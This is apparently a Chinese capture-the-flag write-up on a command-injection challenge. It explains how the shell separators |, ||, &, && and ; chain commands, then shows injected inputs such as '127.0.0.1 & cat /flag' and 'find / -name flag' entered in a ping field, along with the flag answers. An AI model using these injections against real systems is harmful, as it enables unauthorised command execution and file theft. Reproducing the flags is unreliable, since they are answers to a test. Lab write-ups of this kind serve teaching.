0x00 知识点
- 没有过滤,利用常见
管道符命令执行
1、|(就是按位或),直接执行|后面的语句
2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
3、&(就是按位与),&前面和后面命令都要执行,无论前面真假
4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
5、; 前后都执行,无论前面真假,同&,(linux也有)
0x01 解题
127.0.0.1|ls
index.php
- 从根目录开始找flag,耗时长
127.0.0.1 | find / -name flag
/flag
127.0.0.1 & cat /flag
标记{38aee01b-d1a6-4fcb-93f1-dbf86ef25fd8}
PING 127.0.0.1(127.0.0.1):56个数据字节
|cat /flag
;cat /flag
标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}